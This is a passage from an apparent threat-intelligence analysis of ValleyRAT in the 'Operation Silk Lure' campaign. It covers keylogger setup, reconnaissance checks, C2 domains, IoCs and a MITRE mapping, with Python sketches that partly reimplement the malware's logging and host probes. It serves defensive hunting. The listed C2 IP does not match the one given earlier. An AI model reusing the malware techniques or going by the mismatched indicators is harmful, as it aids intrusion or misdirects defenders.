    It prepares the logging environment by creating a dedicated directory and log file (Regedit.log) under ProgramData, performing simple log rotation if the file grows too large, and initializing a DirectInput keyboard device to capture keystrokes with a buffered input model. It also records the Caps Lock state at startup to ensure accurate key interpretation.
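
    A hedged sketch of that logging setup (the directory name, rotation threshold, and rotated-file name are assumptions; the DirectInput capture loop itself is not reproduced):

    import ctypes
    import os
    import pathlib

    LOG_DIR = pathlib.Path(os.environ["ProgramData"]) / "logdir"  # directory name: assumption
    LOG_FILE = LOG_DIR / "Regedit.log"   # log file name as observed in the sample
    MAX_LOG_SIZE = 1024 * 1024           # rotation threshold: assumption

    LOG_DIR.mkdir(parents=True, exist_ok=True)
    if LOG_FILE.exists() and LOG_FILE.stat().st_size > MAX_LOG_SIZE:
        # Simple rotation: shunt the oversized log aside and start fresh.
        LOG_FILE.replace(LOG_FILE.with_name("Regedit.log.old"))

    # Record the Caps Lock toggle state at startup so keys are interpreted
    # correctly (low-order bit of GetKeyState(VK_CAPITAL)).
    caps_on = bool(ctypes.windll.user32.GetKeyState(0x14) & 1)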

    System reconnaissance routine

    ValleyRAT includes a system environment survey routine that collects host information by probing registry keys, security settings, file paths, and custom driver handles.
    It sets a series of feature flags (a1[26..39]) indicating things like UAC mode, AV/driver presence, keylogger/clipboard/screenshot toggles, and single-instance mutex status.
    These flags help the malware decide which features to enable, what protections exist on the host, and whether another instance is already running.

    Index | What it checks | How it checks | Meaning when set (=1)
    a1[26] | IE config present for current user | Reads HKCU\Software\Microsoft\Internet Explorer (via sub_10009F0E) | IE settings value exists (string pointer non-null)
    a1[27] | Ability to open the SECURITY hive | RegOpenKeyExW(HKLM, “SECURITY”, KEY_READ, …) | The SECURITY hive can be opened for read
    a1[28] | UAC secure-desktop prompt enabled | HKLM\…\Policies\System\PromptOnSecureDesktop == 1 | Secure Desktop for elevation prompts is ON
    a1[29] | 360 HVM service autostart | Reads HKLM\SYSTEM\ControlSet001\Services\360Hvm\Start | Value == 1 (system/auto start) ⇒ 360 driver/service present
    a1[30] | OS string contains “Windows” | Fills a buffer via sub_1000B109, searches it with wcsstr(…, “Windows”) | Host OS looks like Windows
    a1[31] | Custom device handle exists | CreateFileW(“\\.\kcuf063Gate”, …) | Can open that device (likely a rootkit/driver comms gate)
    a1[32] | “KEYLOG” feature toggle | Path lookup of %APPDATA%\A686911000006E with “KEYLOG” | Keylogging folder/key present/enabled
    a1[33] | “clipboarddata” feature toggle | Same path lookup with “clipboarddata” | Clipboard capture enabled
    a1[34] | “picshotdata” feature toggle | Same path lookup with “picshotdata” | Screen/webcam snapshot enabled
    a1[35] | VM path byte/flag | Builds %APPDATA%\A686911000006E\vmpath, parses it via sub_1000CF52/sub_1000AA91 | Extracted byte is copied to a global and this flag is set
    a1[36] | “Recording” subkey exists | Opens %APPDATA%\A686911000006E\Recording in HKCU | Recording config present
    a1[37] | Single-instance mutex present | CreateMutexW(“Global\A2F1A73B-…E754C”), checks GetLastError() == ERROR_ALREADY_EXISTS | Another instance is running (or it marks itself as such)
    a1[38] | Filter rules enabled | Checks %APPDATA%\A686911000006E\FILTER\keyword or …\FILTER\netaddr against “0” | Any non-“0” ⇒ filters active
    a1[39] | “stop” kill-switch | Reads %APPDATA%\A686911000006E\FILTER\stop into v18 | Non-zero byte ⇒ stop/disable behavior
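
    Two of these checks are fully specified and can be reproduced for benign host triage. A minimal sketch of the a1[27] and a1[29] probes using Python's winreg module:

    import winreg

    def can_open_security_hive() -> bool:
        # a1[27]: RegOpenKeyExW(HKLM, "SECURITY", KEY_READ) normally fails for
        # non-SYSTEM callers, so success is itself a signal.
        try:
            winreg.CloseKey(winreg.OpenKey(
                winreg.HKEY_LOCAL_MACHINE, "SECURITY", 0, winreg.KEY_READ))
            return True
        except OSError:
            return False

    def hvm360_autostart() -> bool:
        # a1[29]: 360Hvm service Start value == 1 implies the 360 driver/service
        # is installed for system/auto start.
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                                r"SYSTEM\ControlSet001\Services\360Hvm") as key:
                value, _ = winreg.QueryValueEx(key, "Start")
                return value == 1
        except OSError:
            return False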

    Infrastructure Hunting:

    Upon analysing the C2 infrastructure, we discovered that it is hosted by SonderCloud Limited. Additionally, several associated domains resolve to IP addresses located in Hong Kong. All identified domains use the .work TLD and are actively being utilized by the threat actors.

    In addition to the pan.tenire.com domain used to deliver the résumé decoy and malicious payloads, we identified a broader infrastructure cluster on 206.119.175.162 (AS133199, SonderCloud Limited, Hong Kong). More than 20 sibling domains (app.jinanjinyu.work, app.maitangou.work, app.jiangsuzhaochu.work, app.rongxingu.work, app.xinrendu.work, app.owps.work, app.awps.work, and others) were observed pointing to the same IP. The consistent naming convention (app.*.work) and the use of the .work TLD strongly suggest these were intended to impersonate job portals or work applications, fitting neatly with the résumé-themed lure. This indicates a deliberate effort to build a thematic, resilient infrastructure set supporting Operation Silk Lure.
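
    For hunting, the domain/IP overlap is easy to re-check, keeping in mind that resolutions will drift over time:

    import socket

    # Sibling domains observed in the cluster at time of analysis.
    SIBLING_DOMAINS = [
        "app.jinanjinyu.work", "app.maitangou.work", "app.jiangsuzhaochu.work",
        "app.rongxingu.work", "app.xinrendu.work", "app.owps.work", "app.awps.work",
    ]

    for domain in SIBLING_DOMAINS:
        try:
            print(domain, "->", socket.gethostbyname(domain))
        except socket.gaierror:
            print(domain, "-> no longer resolves")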

    Conclusion: Why Operation Silk Lure?

    “Silk” = China-related footprint, and “Lure” = the résumé decoy used to entice victims.

    We named this campaign Operation Silk Lure: Scheduled Tasks Weaponized for DLL Side-Loading because each element of the label maps directly to observable, evidence-backed TTPs. “Silk” signals the campaign's China-centric footprint (a Simplified-Chinese résumé decoy, hosting and DNS activity on Tencent Cloud/DNSPod, and Chinese-pinyin domain names). “Lure” calls out the social-engineering vector (a believable CV used to trick developers, recruiters, and HR into opening the file). “Scheduled Tasks” points to the persistence mechanism we recovered (a dropped CreateHiddenTask.vbs that registers a daily Task Scheduler job named Security). “DLL Side-Loading” highlights the post-execution technique (a keytool.exe loader that side-loads a malicious DLL).

    The name is intentionally descriptive and non-speculative; every token corresponds to an observed artifact or behavior, and it is therefore immediately actionable for defenders: hunt for pan.tenire.com DNS queries, -NoP -ep Bypass PowerShell command lines, %APPDATA%\Security\* artifacts, the Security scheduled task, and anomalous ImageLoad events tied to keytool.exe.

    Seqrite Coverage:

    • Ghanarava.17599037699ce501
    • Trojan.50027.GC
    • Trojan.50026.GC

    IoCs:

    MD5 | File Name
    6ea9555f1874d13246726579263161e8 | CreateHiddenTask.vbs
    f5b9ad341ccfe06352b8818b90b2413e | 李汉彬.lnk
    83b341a1caab40ad1e7adb9fb4a8b911 | 83b341a1caab40ad1e7adb9fb4a8b911.zip
    3ca440a3f4800090ee691e037a9ce501 | jli.dll
    e94e7b953e67cc7f080b83d3a1cdcb1f | keytool.exe

    C2:

    206.119.175.16

    MITRE ATT&CK:

    Tactic | Technique ID | Technique Name
    Initial Access | T1566.001 | Spearphishing Attachment
    Execution | T1059.001 | Command and Scripting Interpreter: PowerShell
    | T1059.005 | Command and Scripting Interpreter: Visual Basic
    | T1053.005 | Scheduled Task/Job: Scheduled Task
    | T1204.002 | User Execution: Malicious File
    Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task
    | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    Privilege Escalation | T1055.001 | Process Injection: Dynamic-link Library Injection
    | T1055.002 | Process Injection: Portable Executable Injection
    Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
    | T1574.001 | Hijack Execution Flow: DLL
    | T1070.004 | Indicator Removal: File Deletion
    | T1070.009 | Indicator Removal: Clear Persistence
    | T1036.008 | Masquerading: Masquerade File Type
    | T1112 | Modify Registry
    | T1027.009 | Obfuscated Files or Information: Embedded Payloads
    | T1027.010 | Obfuscated Files or Information: Command Obfuscation
    | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File
    | T1055.001 | Process Injection: Dynamic-link Library Injection
    | T1497.001 | Virtualization/Sandbox Evasion: System Checks
    | T1497.002 | Virtualization/Sandbox Evasion: User Activity Based Checks
    Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers
    | T1056.001 | Input Capture: Keylogging
    | T1056.002 | Input Capture: GUI Input Capture
    | T1556.004 | Modify Authentication Process: Network Device Authentication
    Discovery | T1083 | File and Directory Discovery
    Collection | T1115 | Clipboard Data
    | T1005 | Data from Local System
    | T1039 | Data from Network Shared Drive
    | T1113 | Screen Capture
    Command and Control | T1071.001 | Application Layer Protocol: Web Protocols
    Exfiltration | T1041 | Exfiltration Over C2 Channel


